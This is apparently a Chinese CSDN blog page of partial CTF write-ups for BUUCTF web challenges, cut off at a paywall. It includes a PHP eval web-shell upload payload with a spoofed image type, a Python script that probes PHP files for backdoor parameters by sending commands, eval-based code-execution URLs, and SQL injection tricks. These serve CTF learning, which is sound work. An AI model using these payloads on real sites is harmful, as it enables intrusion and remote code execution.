buuctf-web部分wp(更新一下)

最新推荐文章于 2024-09-24 14:53:54 发布
最新推荐文章于 2024-09-24 14:53:54 发布
阅读量3.8k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41173457/article/details/104351683
版权
本文是一篇关于CTF(Capture The Flag)网络安全竞赛中Web部分的解题心得,涵盖了BJDCTF、极客大挑战、强网杯等多个比赛的题目,包括SQL注入、文件上传、HTTP头部修改等技术点。通过分享解题过程,文章旨在帮助读者理解Web安全常见漏洞的利用方法。
摘要由CSDN通过智能技术生成

前言(撮合看看吧 因为直接复制的本地 所以图片就没法显示了 有什么不懂的地方可以给我留言哦~ 然后推荐一个公众号:lin先森 求关注)

在这里插入图片描述
b站

[BJDCTF2020]Easy MD5

f12
Hint: select * from ‘admin’ where password=md5($pass,true)
ffifdyop
弱类型绕过
数组绕过

[极客大挑战 2019]Http

修改头

[极客大挑战 2019]Upload

文件上传后缀
php,php3,php4,php5,phtml.pht

phtml后缀

GIF89a? <script language="php">eval($_REQUEST[shell])</script>

Content-Type: image/jpeg

[极客大挑战 2019]LoveSQL

easy
sql注入无任何过滤 常规思路

[强网杯 2019]随便注 |未完

[HCTF 2018]WarmUp | 未完

admin

http://cdusec.happyhacking.top/?post=79

os.system(“ls”)

commands.getstatusoutput(“ls”)

grep -r “flag”

[强网杯 2019]高明的黑客

https://mochazz.github.io/2019/05/27/2019%E5%BC%BA%E7%BD%91%E6%9D%AFWeb%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/#%E9%AB%98%E6%98%8E%E7%9A%84%E9%BB%91%E5%AE%A2

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IsCSF1jR-1581871513527)(evernotecid://74A3E6DA-E009-4797-AA60-5DEED9FE4F7A/appyinxiangcom/23464203/ENResource/p2964)]

import os,re
import requests
filenames = os.listdir('/var/www/html/src')
pattern = re.compile(r"\$_[GEPOST]{3,4}\[.*\]")
for name in filenames:
    print(name)
    with open('/var/www/html/src/'+name,'r') as f:
        data = f.read()
    result = list(set(pattern.findall(data)))

    for ret in result:
        try:
            command = 'uname'
            flag = 'Linux'
            # command = 'phpinfo();'
            # flag = 'phpinfo'
            if 'GET' in ret:
                passwd = re.findall(r"'(.*)'",ret)[0]
                r = requests.get(url='http://127.0.0.1/src/' + name + '?' + passwd + '='+ command)
                if flag in r.text:
                    print('backdoor file is: ' + name)
                    print('GET:  ' + passwd)
            elif 'POST' in ret:
                passwd = re.findall(r"'(.*)'",ret)[0]
                r = requests.post(url='http://127.0.0.1/src/' + name,data={
   passwd:command})
                if flag in r.text:
                    print('backdoor file is: ' + name)
                    print('POST:  ' + passwd)
        except : pass

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-woQNwcUl-1581871513529)(evernotecid://74A3E6DA-E009-4797-AA60-5DEED9FE4F7A/appyinxiangcom/23464203/ENResource/p2965)]

easy_tornado | 未完

[RCTF 2019]Nextphp | 未完

<?php
if (isset($_GET['a'])) {
   
    eval($_GET['a']);
} else {
   
    show_source(__FILE__);
}

尝试使用系统执行发现被禁用,执行phpinfo()发现应该有waf会断开链接,可以在中间加上空格phpinfo ()绕过,然后查看disable_functions发现命令执行都禁用完了(而且无权访问其他目录)

不需要加空格
http://f0ca4e93-3861-4ec5-81f2-1f19a92a56ec.node2.buuoj.cn.wetolink.com:82/?a=phpinfo%20();
http://f0ca4e93-3861-4ec5-81f2-1f19a92a56ec.node2.buuoj.cn.wetolink.com:82/?a=phpinfo();

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fWnlxpIg-1581871513529)(evernotecid://74A3E6DA-E009-4797-AA60-5DEED9FE4F7A/appyinxiangcom/23464203/ENResource/p2977)]

使用print_r(scandir(’./’));发现当前目录还有一个preload.php,使用show_source(‘preload.php’);

http://f0ca4e93-3861-4ec5-81f2-1f19a92a56ec.node2.buuoj.cn.wetolink.com:82/?a=show_source(%22preload.php%22);

preload.php
<?php
final class A implements Serializable {
   
    protected $data = [
        'ret' => null,
        'func' => 'print_r',
        'arg' => '1'
    ];

    private function run () {
   
        $this->data['ret'] = $this->data['func']($this->data['arg']);
    }

    public function __serialize(): array {
   
        return $this->data;
    }

    public function __unserialize(array $data) {
   
        array_merge($this->data, $data);
        $this->run();
    }

    public function serialize (): string {
   
        return serialize($this->data);
    }

    public function unserialize($payload) {
   
        $this->data = unserialize(
最低0.47元/天 解锁文章
woy66
关注
BUUCTF-Web-随便注-wp
single7_的博客
12-14 399
0x01 知识点 SQL注入-堆叠注入 sql预处理语句 巧用contact()函数绕过 0x02 知识铺垫 在SQL中,分号(;)是用来表示一条sql语句的结束。在分号(;)结束一个sql语句后继续构造下一条语句,而后根据结果判断两条甚至多条SQL语句会不会一起执行?这种注入方式称为堆叠注入。 union injection(联合注入)是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语
BUUCTF-WEB
ccfly1012的博客
11-02 3914
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF--Web篇详细wp
Aluxian_的博客
04-10 5671
BUUCTF--Web篇详细wp
[CISCN2019 华北赛区Day2 Web1]HackWorld
最新发布
qq_45636267的博客
09-24 169
CTF的web练习
buuctf web wp
qq_63267612的博客
04-10 582
文章目录[极客大挑战 2019]EasySQL [极客大挑战 2019]EasySQL 打开后是一个登录框,直接尝试万能密码 (用户名:1’ or 1=1 # 密码:随便输) 登录得到flag 这里的万能密码是为什么呢? 数据库中的查询语句: select id from users where username = '' or 1=1-- and password = '456' 又 这里呢1=1永远为真,后面 and password = '456’被注释掉了。数据库不需要考虑,这里我们就跳
BUUCTF web wp
vegetable223的博客
11-28 428
BUUCTF-web warmup wp 首先认真阅读题目,一般题目信息有提示,有些还会有隐藏信息 题目名是“warm up”,热身?,看来没什么用。下面有提示我们这一题的主要知识点是php和代码审计,淦!发现都没学过,不过不要紧,不会我们可以百度啊!!! 打开链接 看到一张滑稽的表情,肯定不简单,直接f12查看源代码 下面展示一些 内联代码片。 <!DOCTYPE html> <html lang="en"> <head> <meta charset=
BUUCTF web第一页WP
东隅的博客
05-13 793
目录 [极客大挑战 2019]EasySQL [HCTF 2018]WarmUp [极客大挑战 2019]Havefun [ACTF2020 新生赛]Include [强网杯 2019]随便注 [极客大挑战 2019]EasySQL payload: 1' or 1=1-- - 1 flag{deb9ccf8-479a-49c9-8412-6171f1c4b057} [HCTF 2018]WarmUp f12查看源码发现提示source.php, 进入获得源代码 .
buuctf-web-[强网杯 2019]随便注-wp
居上
06-22 1430
[强网杯 2019]随便注 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
buuctf-web-[SUCTF 2019]EasySQL 1-wp
居上
06-22 1062
[SUCTF 2019]EasySQL 源码 网上找的源码 <?php session_start(); include_once "config.php"; $post = array(); $get = array(); global $MysqlLink; //GetPara(); $MysqlLink = mysqli_connect("localhost",$datauser,$datapass); if(!$MysqlL
BUUCTF web wp(一)
m0_55854679的博客
06-14 420
[HCTF 2018]WarmUp 打开题目链接,右键点击查看源码,发现source.php 访问source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.p
buuctf-web作业wp
qq_46266956的博客
03-05 1640
1x01题目-[HCTF 2018]WarmUp 知识点: php代码审计--php的基础知识 总结: 对字符串处理的一些函数: empty(),判断是否空 is_string(),判断是否为字符串 urldecode(),进行url解码 in_array(), mb_substr(),针对中文的字符串分割 mb_strpos(),针对中文的字符串出现的位置 1x02题目-[极客大挑战 2019]Havefun 知识点: 无—超级简单的php代码审计吧算 解题: 百年一遇的简单题(看能不能抓住机会了,
BUUCTF web部分WP
Fab1an的博客
06-08 414
首先,你需要找到两个不同的字符串,它们的 MD5 哈希值相同,这可以通过哈希碰撞来实现。F12审查元素,或者ctrl + shift + c 审查元素,发现一段关于php的注释,内容为GET传参,如果cat等于dog的话,就echo打印什么东西。我们根据Linux的特性,用 ../../../../../很多个../去到根目录,然后打开ffffllllaaaagggg,就可以获得flag。数组的md5都是Null,所以它们满足MD5相等的条件。然后id的数组是1,gg的数组是2,满足值不相等的条件。
BUUCTF webwp(四)
m0_55854679的博客
07-28 308
[极客大挑战 2019]Knife 直接使用蚁剑连接即可得到flag。 [极客大挑战 2019]Http 题目给了一个链接,在新网页打开这个链接为三叶草安全技术小组的广告页。pic_center) 查看网页源码,发现了 onclick="return false" href="Secret.php", 访问Secret.php这个页面 提示访问来源不对,此时我们可以通过Referer头来伪造链接来源。 在Secret.php页面使用burp抓包,添加一行 referer:https://www.Sycse
BUUCTF web wp (五)
m0_55854679的博客
07-29 487
[ACTF2020 新生赛]Upload 打开题目链接点击灯泡即可看到隐隐约约的上传文件的框。 上传一个含有一句话木马的php文件 继续上传一个文件内容为一句话木马的jpg文件,发现使用蚁剑连接不成功,于是我们可以在上传jpg文件时使用burp抓包修改文件后缀为phtml 放包后发现页面提示上传的文件的绝对路径,且文件名被修改 使用蚁剑连接时,注意用被修改过的文件名,连接成功后即可得到flag。 [极客大挑战 2019]BabySQL 又是前面熟悉的SQL注入的题目的背景图 首先尝试万能密码登录,发现数据使
buuctf web题的wp
qq_51439282的博客
11-25 583
首先看到buuctf里的 [HCTF 2018]WarmUp 可以发现这道题是关于PHP和代码审计的,好家伙我都不会,有得我学了。 打开链接可以看到一张滑稽脸 那不就直接F12,打开查看器 经过我的仔细观察发现没啥可用的东西,到后面开了题解才发现,oh~,原来要查看这个source.php的源代码(其实前面都说了这道题是关于php和代码审计的,我居然没反应过来) 好家伙,就算知道了这个思路,我也不知道怎么查看这个php的源代码,经过一番查找,才发现我们只需要将它复制下来,然后在我们这个web题的链接后面加
BUUCTF web第三页WP
东隅的博客
10-03 1361
简单来说,就是mt_srand(seed)分发种子,相当于进行产生随机数的初始化,然后通过mt_rand函数获得种子,但是这个随机数并不是真正的随机,他是有可预测性的,如果我们能获得种子,就一定程度上可以获得产生的随机数,根据这个随机数进行验证的部分就不安全了。这个题的逻辑就是在注册的地方进行过滤,我们绕过过滤登陆进去以后,有一个改密码的功能,他是用双引号闭合用户名进行改密码操作的,我们注册好的用户名双引号结尾就可以闭合,后面跟我们进行报错注入的代码就好,至于改密码怎么改是随便填的,重点在注册好的用户名。
BUUCTF web第二页WP
东隅的博客
09-12 1052
一下我得理解,首先这里的id是障眼法不用管,foreach遍历GET数组,传到complex()函数里,$str匹配$re这个正则表达式并且替换为\1,这里\1有特殊含义,e模式下我们的$str会被存入缓冲区,而这个1会导致回调缓冲区的内容,这个时候如果$str是我们想办法利用的getFlag(),再get传入cmd,代码执行不就成了么,最后要说那个$re写成全部匹配就好,像这样: \S*)/),所以会一直递归,?),也就是它把类似a(b(c()d())))这种的全替换为空后只剩下;
BUUCTF 部分web wp
Tiny_Hacker的博客
05-21 1622
又要求我们对secret赋值而且还是POST传参,而且赋的值还得是他指定的,在右下有一串base64加密的字符串,对其进行解码后,得到了一个值,猜测是他指定的那个值。添加XFF后,发现没有回应,尝试其他伪造ip的方式,发现当X-Real-ip时有回应,并出现了flag。查询结果出来了flag字符,对这个flag,没有办法查看,只能借助别人的wp了,对大佬膜拜!访问index.pgp.bak,得到了一个文件,打开后是一串代码,进行审计。又提示我们对key赋值,而且赋值为他给定的值,在源码里发现了key值。
buuctfweb题相关wp
a166342的博客
03-11 501
进入之后是登录界面,考虑用爆破获取账户、密码或使用SQL注入,通过题目的提醒,得知使用SQL注入,因为不知道用户名和密码,考虑使用万能账户和密码,而使用万能账户和密码的就得先知道数据库在检查时使用的闭合方式,已知SQL语句的闭合方式有三种,无引号(例:1),单引号(例:'1')、双引号(例:"1"),一个一个测试,看哪个报错,报错的哪个就是该数据库检查时使用的SQL语句闭合方式,检查之后发现起闭合方式为单引号,则构建语句“a' or true #”,密码随意,点击登录,获得flag;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值